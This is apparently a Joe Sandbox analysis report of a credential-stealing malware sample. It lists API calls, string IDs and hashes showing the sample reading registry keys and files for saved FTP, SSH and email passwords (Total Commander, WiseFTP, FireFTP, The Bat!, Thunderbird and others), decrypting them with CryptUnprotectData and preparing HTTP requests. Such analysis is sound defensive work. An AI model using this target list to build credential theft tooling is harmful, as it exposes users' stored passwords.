                                                • API ID: CloseEnumOpen
                                                • String ID: HostName$Password$PortNumber$TerminalType$UserName
                                                • API String ID: 1332880857-1017491782
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004073BA
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 004073EE
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407580
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: FtpDirectory$FtpPassword$FtpServer$FtpUserName$_FtpPassword
                                                • API String ID: 1332880857-980612798
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 004061FA
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040622E
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 004063C3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: HostDirName$HostName$Password$Port$Username
                                                • API String ID: 1332880857-791697221
                                                APIs
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403C6B
                                                • InternetCreateUrlA.WININET(0000003C,80000000,?,00001FFF), ref: 00403C96
                                                • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403CDC
                                                • wsprintfA.USER32 ref: 00403CFB
                                                • lstrlen.KERNEL32(?,00002000,00002000), ref: 00403D1E
                                                • closesocket.WSOCK32(?,?,00002000,00002000), ref: 00403D48
                                                Strings
                                                • <, xrefs: 00403CB6
                                                • GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98), xrefs: 00403CF3
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Internet$Crack$AllocCreateLocalclosesocketlstrlenwsprintf
                                                • String ID: <$GET %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
                                                • API String ID: 4072649068-555445111
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 0040D5D6
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D60A
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 0040D78D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: Host$Pass$Port$Remote Dir$User
                                                • API String ID: 1332880857-1775099961
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00406D65
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406D99
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406F3A
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumFreeLocalOpen
                                                • String ID: Hostname$Password$Port$Username
                                                • API String ID: 3369285772-1811172798
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00406B31
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406B65
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00406CDA
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumFreeLocalOpen
                                                • String ID: FtpPort$Password$Server$Username
                                                • API String ID: 3369285772-1828875246
                                                • Opcode ID: 11ec69e3b8bca25b19c4894569c200eb6956258e517c22f75082e01047b38843
                                                • Instruction ID: 7ba9846cf84e593e36bc471b668ef0c5a307549365de809292626744771520ce
                                                • Opcode Fuzzy Hash: 11ec69e3b8bca25b19c4894569c200eb6956258e517c22f75082e01047b38843
                                                • Instruction Fuzzy Hash: BE41F43194011CEADF21AB61CC02BDD7AB9FF44304F10C5BAB549740F1DB795AA1AF98
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 0040E247
                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?,?,?), ref: 0040E377
                                                  • Part of subcall function 004043DC: CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 00404428
                                                  • Part of subcall function 004043DC: LocalFree.KERNEL32(00000000), ref: 0040445C
                                                  • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000), ref: 004015D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCryptDataFreeLocalOpenUnprotectlstrlen
                                                • String ID: Folder$Port$Site$UserID$xflags
                                                • API String ID: 2167297517-269738940
                                                • Opcode ID: 3b85365d9d51d3d47f8819171d1d11449a9a411644e434805a5f07b44c17b6d2
                                                • Instruction ID: 29f1f953e1c0832a404ddd4bf1eb832a089b214c1547d71922d0550bed25c438
                                                • Opcode Fuzzy Hash: 3b85365d9d51d3d47f8819171d1d11449a9a411644e434805a5f07b44c17b6d2
                                                • Instruction Fuzzy Hash: 7E31A73591010ABADF126F92CC02FEEBF76AF04344F10853AB920751F1D77A9A60EB48
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 004078DB
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 0040790F
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00407A2A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: DataDir$InstallPath$sites.dat$sites.ini
                                                • API String ID: 1332880857-3870687875
                                                • Opcode ID: b0ed473e7b8700ff30b45b365e22d18518b69f4eb68bba23308813eacdd9ac23
                                                • Instruction ID: e7b8c0c935d4d0c454aa1f99ca68a1ed178d52b45ef830c738b4bbc260966493
                                                • Opcode Fuzzy Hash: b0ed473e7b8700ff30b45b365e22d18518b69f4eb68bba23308813eacdd9ac23
                                                • Instruction Fuzzy Hash: 4531F43194011CFADF216B51CC42FDD7ABABF40304F14C0BABA54740A1CBB96B91AF99
                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F84D
                                                  • Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                  • Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                  • Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                                                  • Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 0040F892
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?), ref: 0040F8AD
                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,?), ref: 0040F8F2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentDirectory$CloseEnumOpen
                                                • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                                                • API String ID: 3062143572-138716004
                                                • Opcode ID: f06d37bfe171a568b370491e0634d08446b017f874cf0aa5a1507adbf09138d6
                                                • Instruction ID: 97e5a13185e0f9c508a72f46a089416fd48b8e24879e356ae91fef65a2890253
                                                • Opcode Fuzzy Hash: f06d37bfe171a568b370491e0634d08446b017f874cf0aa5a1507adbf09138d6
                                                • Instruction Fuzzy Hash: 60111F30788208BADF11BB61CC43FCD7A75AB10748F508466B648751E3DBF99AD49B48
                                                APIs
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                • wsprintfA.USER32 ref: 0040F041
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLocalwsprintf
                                                • String ID: Count$Default$Dir #%d$ProgramDir$Software\RIT\The Bat!$Software\RIT\The Bat!\Users depot$Working Directory
                                                • API String ID: 988369812-1921698578
                                                • Opcode ID: c69ef0954902c4713d423042458d5ad8077758b8e240eb6b0a7ef15e578b7c8b
                                                • Instruction ID: cd3023906f6ae057e5bdde1cd0ba176c3d04abf87e76bd78a7c681664f89a6ca
                                                • Opcode Fuzzy Hash: c69ef0954902c4713d423042458d5ad8077758b8e240eb6b0a7ef15e578b7c8b
                                                • Instruction Fuzzy Hash: 50313A34E40209FADF11AFA1DC42EEE7A75AF00304F6085B7F410B51E1DB798BA5AB48
                                                APIs
                                                  • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,00000105), ref: 00404C7B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocDirectoryLocalWindows
                                                • String ID: FtpIniName$InstallDir$Software\Ghisler\Total Commander$Software\Ghisler\Windows Commander$\GHISLER
                                                • API String ID: 3186838798-3636168975
                                                • Opcode ID: e1180aaf9e104248c188084496e5579582a0455784a27724e84bb6210bb2b144
                                                • Instruction ID: 43e3b734b20d4af43a7562869c4868c7ee74a92454cd73f3ffe9b37604960ea0
                                                • Opcode Fuzzy Hash: e1180aaf9e104248c188084496e5579582a0455784a27724e84bb6210bb2b144
                                                • Instruction Fuzzy Hash: E841EEB4A80608BAEF123B62CC43FDD7A66DF80744F60857B7A10750F2DABD99509A5C
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00404931
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404965
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,?,00000000,00000000,00000000,00000000,?,?), ref: 00404A8C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: HostName$Password$User
                                                • API String ID: 1332880857-1253078594
                                                • Opcode ID: 4a85df01347939210b02000536b6b93f7d15e784ea2387980c8e06d266f9e334
                                                • Instruction ID: 70a3f47a41d3c5b7bb25802f3bcf3ab2eab4f79ca17ead1258ab74d3b4d68c93
                                                • Opcode Fuzzy Hash: 4a85df01347939210b02000536b6b93f7d15e784ea2387980c8e06d266f9e334
                                                • Instruction Fuzzy Hash: B131F37594011CBADF22AB61CC02BDD7ABABF84304F10C4BAB544750F1DB795B92AF88
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00408E20
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408E54
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00408F46
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseEnumOpen
                                                • String ID: wiseftp.ini$wiseftpsrvs.bin$wiseftpsrvs.ini
                                                • API String ID: 1332880857-3184955129
                                                • Opcode ID: f5b38355ca61edcf822cd5411a7ff64ac3fe564a5c6de9ab292277dc4e2fa863
                                                • Instruction ID: 379df70dab51ed1233c69cde4acd9fbee75a0c7acd1daed002fcfe2591656a96
                                                • Opcode Fuzzy Hash: f5b38355ca61edcf822cd5411a7ff64ac3fe564a5c6de9ab292277dc4e2fa863
                                                • Instruction Fuzzy Hash: 9031E33190010DBADF21AB61CD42FDD7ABABF40304F1084BAB654B41E1DE799B91AF98
                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409E28
                                                • SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409E6D
                                                  • Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
                                                  • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
                                                  • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                                                  • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentDirectorylstrlen$FreeLocallstrcatlstrcpy
                                                • String ID: Firefox$Software\Mozilla$\Mozilla\Firefox\$fireFTPsites.dat
                                                • API String ID: 3007406096-624000163
                                                • Opcode ID: baf3640e4e59c84cdb8530a01f1c66f88f8b17e9021d25bd85c5b007fc2217b5
                                                • Instruction ID: 7ca379dd8bd6ced9b34700e741701d984c4c6656734aaf013cc51c489d735693
                                                • Opcode Fuzzy Hash: baf3640e4e59c84cdb8530a01f1c66f88f8b17e9021d25bd85c5b007fc2217b5
                                                • Instruction Fuzzy Hash: E1011E70680209BADF21BB61CC47FDE3A699B44744F11807E7A04B51E3DFB9CA909A9D
                                                APIs
                                                • StrStrIA.SHLWAPI(00704138,3D-FTP), ref: 0040CA80
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$FreeLocal
                                                • String ID: 3D-FTP$8Ap$\3D-FTP$\SiteDesigner$sites.ini
                                                • API String ID: 1884169789-2647014798
                                                • Opcode ID: f1cda09d36af23cc2d8ad47fd755b2eaecaedc9644cf417539652a50c413c888
                                                • Instruction ID: 3a8ef14eedaa50b1c948b24bf2c7183635c18f20d59f5e60411f4875eb663bb9
                                                • Opcode Fuzzy Hash: f1cda09d36af23cc2d8ad47fd755b2eaecaedc9644cf417539652a50c413c888
                                                • Instruction Fuzzy Hash: D6119E70740105BAEF11B772CC42FAF2D599B81758F24023B7810B11E3DABCCA91A6AC
                                                APIs
                                                • lstrlen.KERNEL32(?), ref: 00401E19
                                                • lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                • lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$lstrcatlstrcpy
                                                • String ID: GHA$GHA
                                                • API String ID: 2414487701-4188437078
                                                • Opcode ID: 34c88bd1cf41f402060629731bcca75dca71093ee9173761b317a5b5713cf568
                                                • Instruction ID: 85b7a3d42229304cf13bff08406ee8d7f14fa5e6f164b37a1fc03a90bdb793dc
                                                • Opcode Fuzzy Hash: 34c88bd1cf41f402060629731bcca75dca71093ee9173761b317a5b5713cf568
                                                • Instruction Fuzzy Hash: 38F01C75100208BFDF017F62CC81A9D3B9AAB5035CF00D52AB91519152E7BD89E48B58
                                                APIs
                                                • StrStrIA.SHLWAPI(?,?), ref: 00409C48
                                                • RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
                                                • RegEnumKeyExA.ADVAPI32(?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409CEB
                                                • RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
                                                  • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
                                                  • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
                                                  • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482
                                                  • Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
                                                  • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
                                                  • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                                                  • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                                  • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$CloseEnumFreeLocalOpenlstrcatlstrcpy
                                                • String ID: PathToExe
                                                • API String ID: 3012581338-1982016430
                                                • Opcode ID: 73213ca5d57d2b4711005681e2f74eb1c6930d4b9632169aaf3f735d5df23248
                                                • Instruction ID: 26fdae1b99b3a41fd3c75be40dc832e850ec111ed163878dae6f9528ba595cbd
                                                • Opcode Fuzzy Hash: 73213ca5d57d2b4711005681e2f74eb1c6930d4b9632169aaf3f735d5df23248
                                                • Instruction Fuzzy Hash: BE310F7195410ABAEF017FA1CD42EEE7F75EF04304F104436BA10750F2DA799A60AB59
                                                APIs
                                                • GetTempPathA.KERNEL32(00000104,?), ref: 0040282D
                                                • GetHGlobalFromStream.OLE32(?,?,?,00000000,?,00000000,?,00000104,?), ref: 004028AF
                                                • GlobalLock.KERNEL32(?), ref: 004028BB
                                                • GlobalUnlock.KERNEL32(?), ref: 004028DD
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
                                                  • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
                                                  • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
                                                  • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                                  • Part of subcall function 00401E4C: lstrlen.KERNEL32(?), ref: 00401E6D
                                                  • Part of subcall function 00401E4C: lstrlen.KERNEL32(00000000,?), ref: 00401E77
                                                  • Part of subcall function 00401E4C: lstrcpy.KERNEL32(00000000,?), ref: 00401E8B
                                                  • Part of subcall function 00401E4C: lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2198539250.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000005.00000002.2198491316.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_400000_SGS.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$Global$lstrcatlstrcpy$FromLockPathStreamTempUnlock
                                                • String ID: Software\WinRAR
                                                • API String ID: 2536169780-224198155
                                                • Opcode ID: 3295198c31234e8877b1d9cd2fd133cac00906a26a66ff8a9dc9dec2104a8318
                                                • Instruction ID: b236df76ed398757315f06d6d85d08d7d8e67b150c60cd6550e710cec1d30196
                                                • Instruction Fuzzy Hash: 01211D76900109BBDF55BBA1CD46EDEBB69AF04348F108576B600B10E1D6B98B94AB18
                                                APIs
                                                • RegOpenKeyA.ADVAPI32(?,?), ref: 00404823
                                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,00000000,00000000,?,?), ref: 0040485C
